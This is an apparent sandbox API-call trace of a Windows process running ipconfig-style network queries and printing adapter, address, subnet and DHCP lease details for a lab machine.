	[0218.563] CoCreateInstance (in: rclsid=0xa314a4*(Data1=0xeb082ba1, Data2=0xdf8a, Data3=0x46be, Data4=([0]=0x82, [1]=0xf3, [2]=0x35, [3]=0xbf, [4]=0x9e, [5]=0x9b, [6]=0xe5, [7]=0x2f)), pUnkOuter=0x0, dwClsContext=0x3, riid=0xa31494*(Data1=0x432a1da5, Data2=0x3888, Data3=0x4b9a, Data4=([0]=0xa7, [1]=0x34, [2]=0xcf, [3]=0xf1, [4]=0xe4, [5]=0x48, [6]=0xc5, [7]=0xb9)), ppv=0x21fe20 | out: ppv=0x21fe20*=0x41873c) returned 0x0
	[0218.625] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName="ServicesActive", dwDesiredAccess=0x1) returned 0x432fd0
	[0218.626] OpenServiceW (hSCManager=0x432fd0, lpServiceName="NapAgent", dwDesiredAccess=0x4) returned 0x432f30
	[0218.627] QueryServiceStatus (in: hService=0x432f30, lpServiceStatus=0x21fd94 | out: lpServiceStatus=0x21fd94*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1
	[0218.627] CloseServiceHandle (hSCObject=0x432f30) returned 1
	[0218.627] CloseServiceHandle (hSCObject=0x432fd0) returned 1
	[0218.628] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2710, dwLanguageId=0x0, lpBuffer=0x21fdbc, nSize=0x0, Arguments=0x21fdb8 | out: lpBuffer="\x7980\x43\xfe2c\x21\x2482\xa3\x2710") returned 0x1e
	[0218.628] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.628] GetFileType (hFile=0x150) returned 0x3
	[0218.628] GetProcessHeap () returned 0x400000
	[0218.628] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x3c) returned 0x4187c8
	[0218.628] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nWindows IP Configuration\r\n\r\n", cchWideChar=30, lpMultiByteStr=0x4187c8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nWindows IP Configuration\r\n\r\n", lpUsedDefaultChar=0x0) returned 30
	[0218.628] WriteFile (in: hFile=0x150, lpBuffer=0x4187c8*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x21fda0, lpOverlapped=0x0 | out: lpBuffer=0x4187c8*, lpNumberOfBytesWritten=0x21fda0*=0x1e, lpOverlapped=0x0) returned 1
	[0218.628] GetProcessHeap () returned 0x400000
	[0218.628] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4187c8 | out: hHeap=0x400000) returned 1
	[0218.628] LocalFree (hMem=0x437980) returned 0x0
	[0218.628] GetComputerNameExW (in: NameType=0x1, lpBuffer=0x21fba0, nSize=0x21fb9c | out: lpBuffer="ZgW5tdPu", nSize=0x21fb9c) returned 1
	[0218.628] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2711, dwLanguageId=0x0, lpBuffer=0x21fb74, nSize=0x0, Arguments=0x21fb70 | out: lpBuffer="\x7980\x43\xfda4\x21\x164e\xa3\x2711") returned 0x31
	[0218.628] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.628] GetFileType (hFile=0x150) returned 0x3
	[0218.628] GetProcessHeap () returned 0x400000
	[0218.628] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x62) returned 0x4316b0
	[0218.628] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Host Name . . . . . . . . . . . . : ZgW5tdPu\r\n", cchWideChar=49, lpMultiByteStr=0x4316b0, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Host Name . . . . . . . . . . . . : ZgW5tdPu\r\n", lpUsedDefaultChar=0x0) returned 49
	[0218.628] WriteFile (in: hFile=0x150, lpBuffer=0x4316b0*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x21fb58, lpOverlapped=0x0 | out: lpBuffer=0x4316b0*, lpNumberOfBytesWritten=0x21fb58*=0x31, lpOverlapped=0x0) returned 1
	[0218.628] GetProcessHeap () returned 0x400000
	[0218.628] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4316b0 | out: hHeap=0x400000) returned 1
	[0218.628] LocalFree (hMem=0x437980) returned 0x0
	[0218.628] GetComputerNameExW (in: NameType=0x2, lpBuffer=0x21fba0, nSize=0x21fb9c | out: lpBuffer="", nSize=0x21fb9c) returned 1
	[0218.629] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2712, dwLanguageId=0x0, lpBuffer=0x21fb74, nSize=0x0, Arguments=0x21fb70 | out: lpBuffer="\x7980\x43\xfda4\x21\x1681\xa3\x2712") returned 0x29
	[0218.629] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.629] GetFileType (hFile=0x150) returned 0x3
	[0218.629] GetProcessHeap () returned 0x400000
	[0218.629] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x52) returned 0x430a28
	[0218.629] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Primary Dns Suffix  . . . . . . . : \r\n", cchWideChar=41, lpMultiByteStr=0x430a28, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Primary Dns Suffix  . . . . . . . : \r\n", lpUsedDefaultChar=0x0) returned 41
	[0218.629] WriteFile (in: hFile=0x150, lpBuffer=0x430a28*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x21fb58, lpOverlapped=0x0 | out: lpBuffer=0x430a28*, lpNumberOfBytesWritten=0x21fb58*=0x29, lpOverlapped=0x0) returned 1
	[0218.629] GetProcessHeap () returned 0x400000
	[0218.629] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x430a28 | out: hHeap=0x400000) returned 1
	[0218.629] LocalFree (hMem=0x437980) returned 0x0
	[0218.629] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x21fb9c | out: pFixedInfo=0x0, pOutBufLen=0x21fb9c) returned 0x6f
	[0218.641] GetProcessHeap () returned 0x400000
	[0218.641] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x248) returned 0x43e008
	[0218.641] GetNetworkParams (in: pFixedInfo=0x43e008, pOutBufLen=0x21fb9c | out: pFixedInfo=0x43e008, pOutBufLen=0x21fb9c) returned 0x0
	[0218.647] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2725, dwLanguageId=0x0, lpBuffer=0x21fb78, nSize=0x0, Arguments=0x21fb74 | out: lpBuffer="\x7980\x43\xfda4\x21\x16df\xa3\x2725") returned 0x2f
	[0218.647] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.647] GetFileType (hFile=0x150) returned 0x3
	[0218.647] GetProcessHeap () returned 0x400000
	[0218.647] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x5e) returned 0x4350e0
	[0218.647] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Node Type . . . . . . . . . . . . : Hybrid\r\n", cchWideChar=47, lpMultiByteStr=0x4350e0, cbMultiByte=94, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Node Type . . . . . . . . . . . . : Hybrid\r\n", lpUsedDefaultChar=0x0) returned 47
	[0218.648] WriteFile (in: hFile=0x150, lpBuffer=0x4350e0*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x21fb5c, lpOverlapped=0x0 | out: lpBuffer=0x4350e0*, lpNumberOfBytesWritten=0x21fb5c*=0x2f, lpOverlapped=0x0) returned 1
	[0218.648] GetProcessHeap () returned 0x400000
	[0218.648] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4350e0 | out: hHeap=0x400000) returned 1
	[0218.648] LocalFree (hMem=0x437980) returned 0x0
	[0218.648] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x272e, dwLanguageId=0x0, lpBuffer=0x21fb74, nSize=0x0, Arguments=0x21fb70 | out: lpBuffer="\x7980\x43\xfda4\x21\x16f0\xa3\x272e") returned 0x2b
	[0218.648] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.648] GetFileType (hFile=0x150) returned 0x3
	[0218.648] GetProcessHeap () returned 0x400000
	[0218.648] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x56) returned 0x430a28
	[0218.648] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   IP Routing Enabled. . . . . . . . : No\r\n", cchWideChar=43, lpMultiByteStr=0x430a28, cbMultiByte=86, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   IP Routing Enabled. . . . . . . . : No\r\n", lpUsedDefaultChar=0x0) returned 43
	[0218.648] WriteFile (in: hFile=0x150, lpBuffer=0x430a28*, nNumberOfBytesToWrite=0x2b, lpNumberOfBytesWritten=0x21fb58, lpOverlapped=0x0 | out: lpBuffer=0x430a28*, lpNumberOfBytesWritten=0x21fb58*=0x2b, lpOverlapped=0x0) returned 1
	[0218.648] GetProcessHeap () returned 0x400000
	[0218.648] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x430a28 | out: hHeap=0x400000) returned 1
	[0218.648] LocalFree (hMem=0x437980) returned 0x0
	[0218.648] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2738, dwLanguageId=0x0, lpBuffer=0x21fb78, nSize=0x0, Arguments=0x21fb74 | out: lpBuffer="\x7980\x43\xfda4\x21\x184c\xa3\x2738") returned 0x2b
	[0218.648] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.648] GetFileType (hFile=0x150) returned 0x3
	[0218.648] GetProcessHeap () returned 0x400000
	[0218.648] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x56) returned 0x430a28
	[0218.648] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   WINS Proxy Enabled. . . . . . . . : No\r\n", cchWideChar=43, lpMultiByteStr=0x430a28, cbMultiByte=86, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   WINS Proxy Enabled. . . . . . . . : No\r\n", lpUsedDefaultChar=0x0) returned 43
	[0218.648] WriteFile (in: hFile=0x150, lpBuffer=0x430a28*, nNumberOfBytesToWrite=0x2b, lpNumberOfBytesWritten=0x21fb5c, lpOverlapped=0x0 | out: lpBuffer=0x430a28*, lpNumberOfBytesWritten=0x21fb5c*=0x2b, lpOverlapped=0x0) returned 1
	[0218.648] GetProcessHeap () returned 0x400000
	[0218.648] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x430a28 | out: hHeap=0x400000) returned 1
	[0218.648] LocalFree (hMem=0x437980) returned 0x0
	[0218.648] GetProcessHeap () returned 0x400000
	[0218.648] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x43e008 | out: hHeap=0x400000) returned 1
	[0218.648] DnsQueryConfigAllocEx () returned 0xf0a40
	[0218.649] DnsFreeConfigStructure () returned 0x1
	[0218.649] ObjectStublessClient4 () 
	[0218.651] GetAdaptersAddresses () returned 0x6f
	[0218.656] LocalAlloc (uFlags=0x40, uBytes=0x8f0) returned 0x43f6e0
	[0218.656] GetAdaptersAddresses () returned 0x0
	[0218.660] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2758, dwLanguageId=0x0, lpBuffer=0x21fb80, nSize=0x0, Arguments=0x21fb7c | out: lpBuffer="\x7980\x43\xfd7c\x21\x1a89\xa3\x2758") returned 0x2d
	[0218.660] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.660] GetFileType (hFile=0x150) returned 0x3
	[0218.661] GetProcessHeap () returned 0x400000
	[0218.661] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x5a) returned 0x4350e0
	[0218.661] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nEthernet adapter Local Area Connection:\r\n\r\n", cchWideChar=45, lpMultiByteStr=0x4350e0, cbMultiByte=90, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nEthernet adapter Local Area Connection:\r\n\r\n", lpUsedDefaultChar=0x0) returned 45
	[0218.661] WriteFile (in: hFile=0x150, lpBuffer=0x4350e0*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x21fb64, lpOverlapped=0x0 | out: lpBuffer=0x4350e0*, lpNumberOfBytesWritten=0x21fb64*=0x2d, lpOverlapped=0x0) returned 1
	[0218.661] GetProcessHeap () returned 0x400000
	[0218.661] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4350e0 | out: hHeap=0x400000) returned 1
	[0218.661] LocalFree (hMem=0x437980) returned 0x0
	[0218.661] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x277e, dwLanguageId=0x0, lpBuffer=0x21fb80, nSize=0x0, Arguments=0x21fb7c | out: lpBuffer="\x7980\x43\xfd7c\x21\x1aa2\xa3\x277e") returned 0x29
	[0218.661] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.661] GetFileType (hFile=0x150) returned 0x3
	[0218.661] GetProcessHeap () returned 0x400000
	[0218.661] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x52) returned 0x430a88
	[0218.661] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Connection-specific DNS Suffix  . : \r\n", cchWideChar=41, lpMultiByteStr=0x430a88, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Connection-specific DNS Suffix  . : \r\n", lpUsedDefaultChar=0x0) returned 41
	[0218.661] WriteFile (in: hFile=0x150, lpBuffer=0x430a88*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x21fb64, lpOverlapped=0x0 | out: lpBuffer=0x430a88*, lpNumberOfBytesWritten=0x21fb64*=0x29, lpOverlapped=0x0) returned 1
	[0218.661] GetProcessHeap () returned 0x400000
	[0218.661] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x430a88 | out: hHeap=0x400000) returned 1
	[0218.661] LocalFree (hMem=0x437980) returned 0x0
	[0218.661] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x277f, dwLanguageId=0x0, lpBuffer=0x21fb80, nSize=0x0, Arguments=0x21fb7c | out: lpBuffer="\x7980\x43\xfd7c\x21\x1aba\xa3\x277f") returned 0x50
	[0218.661] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.661] GetFileType (hFile=0x150) returned 0x3
	[0218.661] GetProcessHeap () returned 0x400000
	[0218.661] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0xa0) returned 0x432a40
	[0218.661] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection\r\n", cchWideChar=80, lpMultiByteStr=0x432a40, cbMultiByte=160, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection\r\n\x0e", lpUsedDefaultChar=0x0) returned 80
	[0218.661] WriteFile (in: hFile=0x150, lpBuffer=0x432a40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x21fb64, lpOverlapped=0x0 | out: lpBuffer=0x432a40*, lpNumberOfBytesWritten=0x21fb64*=0x50, lpOverlapped=0x0) returned 1
	[0218.661] GetProcessHeap () returned 0x400000
	[0218.661] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x432a40 | out: hHeap=0x400000) returned 1
	[0218.661] LocalFree (hMem=0x437980) returned 0x0
	[0218.661] _vsnwprintf (in: _Buffer=0x21fcf4, _BufferCount=0x40, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="00-") returned 3
	[0218.661] _vsnwprintf (in: _Buffer=0x21fcfa, _BufferCount=0x3a, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="0A-") returned 3
	[0218.661] _vsnwprintf (in: _Buffer=0x21fd00, _BufferCount=0x34, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="91-") returned 3
	[0218.661] _vsnwprintf (in: _Buffer=0x21fd06, _BufferCount=0x2e, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="6E-") returned 3
	[0218.661] _vsnwprintf (in: _Buffer=0x21fd0c, _BufferCount=0x28, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="33-") returned 3
	[0218.661] _vsnwprintf (in: _Buffer=0x21fd12, _BufferCount=0x22, _Format="%02X-", _ArgList=0x21fb90 | out: _Buffer="D9-") returned 3
	[0218.662] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2780, dwLanguageId=0x0, lpBuffer=0x21fb80, nSize=0x0, Arguments=0x21fb7c | out: lpBuffer="\x7980\x43\xfd7c\x21\x1a09\xa3\x2780") returned 0x3a
	[0218.662] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.662] GetFileType (hFile=0x150) returned 0x3
	[0218.662] GetProcessHeap () returned 0x400000
	[0218.662] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x74) returned 0x40ee90
	[0218.662] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Physical Address. . . . . . . . . : 00-0A-91-6E-33-D9\r\n", cchWideChar=58, lpMultiByteStr=0x40ee90, cbMultiByte=116, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Physical Address. . . . . . . . . : 00-0A-91-6E-33-D9\r\n", lpUsedDefaultChar=0x0) returned 58
	[0218.662] WriteFile (in: hFile=0x150, lpBuffer=0x40ee90*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x21fb64, lpOverlapped=0x0 | out: lpBuffer=0x40ee90*, lpNumberOfBytesWritten=0x21fb64*=0x3a, lpOverlapped=0x0) returned 1
	[0218.662] GetProcessHeap () returned 0x400000
	[0218.662] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x40ee90 | out: hHeap=0x400000) returned 1
	[0218.662] LocalFree (hMem=0x437980) returned 0x0
	[0218.662] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2782, dwLanguageId=0x0, lpBuffer=0x21fb84, nSize=0x0, Arguments=0x21fb80 | out: lpBuffer="\x7980\x43\xfd7c\x21\x1a1f\xa3\x2782") returned 0x2c
	[0218.662] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.662] GetFileType (hFile=0x150) returned 0x3
	[0218.662] GetProcessHeap () returned 0x400000
	[0218.662] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x58) returned 0x430a88
	[0218.662] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   DHCP Enabled. . . . . . . . . . . : Yes\r\n", cchWideChar=44, lpMultiByteStr=0x430a88, cbMultiByte=88, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   DHCP Enabled. . . . . . . . . . . : Yes\r\na", lpUsedDefaultChar=0x0) returned 44
	[0218.662] WriteFile (in: hFile=0x150, lpBuffer=0x430a88*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x21fb68, lpOverlapped=0x0 | out: lpBuffer=0x430a88*, lpNumberOfBytesWritten=0x21fb68*=0x2c, lpOverlapped=0x0) returned 1
	[0218.662] GetProcessHeap () returned 0x400000
	[0218.662] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x430a88 | out: hHeap=0x400000) returned 1
	[0218.662] LocalFree (hMem=0x437980) returned 0x0
	[0218.662] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2789, dwLanguageId=0x0, lpBuffer=0x21fb84, nSize=0x0, Arguments=0x21fb80 | out: lpBuffer="\x7980\x43\xfd7c\x21\x1a2a\xa3\x2789") returned 0x2c
	[0218.662] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.662] GetFileType (hFile=0x150) returned 0x3
	[0218.662] GetProcessHeap () returned 0x400000
	[0218.662] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x58) returned 0x430a88
	[0218.662] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Autoconfiguration Enabled . . . . : Yes\r\n", cchWideChar=44, lpMultiByteStr=0x430a88, cbMultiByte=88, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Autoconfiguration Enabled . . . . : Yes\r\na", lpUsedDefaultChar=0x0) returned 44
	[0218.662] WriteFile (in: hFile=0x150, lpBuffer=0x430a88*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x21fb68, lpOverlapped=0x0 | out: lpBuffer=0x430a88*, lpNumberOfBytesWritten=0x21fb68*=0x2c, lpOverlapped=0x0) returned 1
	[0218.662] GetProcessHeap () returned 0x400000
	[0218.662] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x430a88 | out: hHeap=0x400000) returned 1
	[0218.662] LocalFree (hMem=0x437980) returned 0x0
	[0218.662] RtlIpv6AddressToStringExW () returned 0x0
	[0218.662] FormatMessageW (in: dwFlags=0x8ff, lpSource=0x0, dwMessageId=0x29ee, dwLanguageId=0x0, lpBuffer=0x21fccc, nSize=0x14, Arguments=0x0 | out: lpBuffer="(Preferred) ") returned 0xc
	[0218.662] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x296a, dwLanguageId=0x0, lpBuffer=0x21fb7c, nSize=0x0, Arguments=0x21fb78 | out: lpBuffer="\x7980\x43\xfd7c\x21\x1b78\xa3\x296a") returned 0x51
	[0218.662] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.662] GetFileType (hFile=0x150) returned 0x3
	[0218.663] GetProcessHeap () returned 0x400000
	[0218.663] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0xa2) returned 0x432a40
	[0218.663] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Link-local IPv6 Address . . . . . : fe80::9594:91b6:d807:49d3%11(Preferred) \r\n", cchWideChar=81, lpMultiByteStr=0x432a40, cbMultiByte=162, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Link-local IPv6 Address . . . . . : fe80::9594:91b6:d807:49d3%11(Preferred) \r\n", lpUsedDefaultChar=0x0) returned 81
	[0218.663] WriteFile (in: hFile=0x150, lpBuffer=0x432a40*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x21fb60, lpOverlapped=0x0 | out: lpBuffer=0x432a40*, lpNumberOfBytesWritten=0x21fb60*=0x51, lpOverlapped=0x0) returned 1
	[0218.663] GetProcessHeap () returned 0x400000
	[0218.663] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x432a40 | out: hHeap=0x400000) returned 1
	[0218.663] LocalFree (hMem=0x437980) returned 0x0
	[0218.663] RtlIpv4AddressToStringExW () returned 0x0
	[0218.663] FormatMessageW (in: dwFlags=0x8ff, lpSource=0x0, dwMessageId=0x29ee, dwLanguageId=0x0, lpBuffer=0x21fccc, nSize=0x14, Arguments=0x0 | out: lpBuffer="(Preferred) ") returned 0xc
	[0218.663] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x278a, dwLanguageId=0x0, lpBuffer=0x21fb7c, nSize=0x0, Arguments=0x21fb78 | out: lpBuffer="\x7980\x43\xfd7c\x21\x2806\xa3\x278a") returned 0x42
	[0218.663] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.663] GetFileType (hFile=0x150) returned 0x3
	[0218.663] GetProcessHeap () returned 0x400000
	[0218.663] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x84) returned 0x4316b0
	[0218.663] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   IPv4 Address. . . . . . . . . . . : 192.168.0.251(Preferred) \r\n", cchWideChar=66, lpMultiByteStr=0x4316b0, cbMultiByte=132, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   IPv4 Address. . . . . . . . . . . : 192.168.0.251(Preferred) \r\n", lpUsedDefaultChar=0x0) returned 66
	[0218.663] WriteFile (in: hFile=0x150, lpBuffer=0x4316b0*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x21fb60, lpOverlapped=0x0 | out: lpBuffer=0x4316b0*, lpNumberOfBytesWritten=0x21fb60*=0x42, lpOverlapped=0x0) returned 1
	[0218.663] GetProcessHeap () returned 0x400000
	[0218.663] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4316b0 | out: hHeap=0x400000) returned 1
	[0218.663] LocalFree (hMem=0x437980) returned 0x0
	[0218.663] ConvertLengthToIpv4Mask (in: MaskLength=0x18, Mask=0x21fbb0 | out: Mask=0x21fbb0) returned 0x0
	[0218.663] inet_ntoa (in=0xffffff) returned="255.255.255.0"
	[0218.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4316cc, cbMultiByte=-1, lpWideCharStr=0x21fcf4, cchWideChar=100 | out: lpWideCharStr="255.255.255.0") returned 14
	[0218.670] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x278c, dwLanguageId=0x0, lpBuffer=0x21fb80, nSize=0x0, Arguments=0x21fb7c | out: lpBuffer="\x6af8\x43\xfd7c\x21\x2841\xa3\x278c") returned 0x36
	[0218.670] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.670] GetFileType (hFile=0x150) returned 0x3
	[0218.670] GetProcessHeap () returned 0x400000
	[0218.670] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x6c) returned 0x432a40
	[0218.670] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n", cchWideChar=54, lpMultiByteStr=0x432a40, cbMultiByte=108, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n:d807:49d3%11(Preferred) \r\n", lpUsedDefaultChar=0x0) returned 54
	[0218.670] WriteFile (in: hFile=0x150, lpBuffer=0x432a40*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x21fb64, lpOverlapped=0x0 | out: lpBuffer=0x432a40*, lpNumberOfBytesWritten=0x21fb64*=0x36, lpOverlapped=0x0) returned 1
	[0218.670] GetProcessHeap () returned 0x400000
	[0218.670] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x432a40 | out: hHeap=0x400000) returned 1
	[0218.670] LocalFree (hMem=0x436af8) returned 0x0
	[0218.670] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x21fba0 | out: lpSystemTimeAsFileTime=0x21fba0*(dwLowDateTime=0x6a7a3a40, dwHighDateTime=0x1d50a6a)) 
	[0218.670] FileTimeToLocalFileTime (in: lpFileTime=0x21fba0, lpLocalFileTime=0x21fb78 | out: lpLocalFileTime=0x21fb78) returned 1
	[0218.670] FileTimeToSystemTime (in: lpFileTime=0x21fb78, lpSystemTime=0x21fb68 | out: lpSystemTime=0x21fb68) returned 1
	[0218.670] GetDateFormatW (in: Locale=0x400, dwFlags=0x2, lpDate=0x21fb68, lpFormat=0x0, lpDateStr=0x21fbcc, cchDate=128 | out: lpDateStr="Tuesday, May 14, 2019") returned 22
	[0218.670] GetTimeFormatW (in: Locale=0x400, dwFlags=0x0, lpTime=0x21fb68, lpFormat=0x0, lpTimeStr=0x21fbf8, cchTime=106 | out: lpTimeStr="3:30:31 PM") returned 11
	[0218.670] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x27a6, dwLanguageId=0x0, lpBuffer=0x21fb80, nSize=0x0, Arguments=0x21fb7c | out: lpBuffer="\x6af8\x43\xfd7c\x21\x22ca\xa3\x27a6") returned 0x49
	[0218.670] GetStdHandle (nStdHandle=0xfffffff5) returned 0x150
	[0218.670] GetFileType (hFile=0x150) returned 0x3
	[0218.670] GetProcessHeap () returned 0x400000
	[0218.670] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x92) returned 0x432a40
	[0218.670] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="   Lease Obtained. . . . . . . . . . : Tuesday, May 14, 2019 3:30:31 PM\r\n", cchWideChar=73, lpMultiByteStr=0x432a40, cbMultiByte=146, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="   Lease Obtained. . . . . . . . . . : Tuesday, May 14, 2019 3:30:31 PM\r\nrred) \r\n", lpUsedDefaultChar=0x0) returned 73
	[0218.670] WriteFile (in: hFile=0x150, lpBuffer=0x432a40*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x21fb64, lpOverlapped=0x0 | out: lpBuffer=0x432a40*, lpNumberOfBytesWritten=0x21fb64*=0x49, lpOverlapped=0x0) returned 1
	[0218.670] GetProcessHeap () returned 0x400000
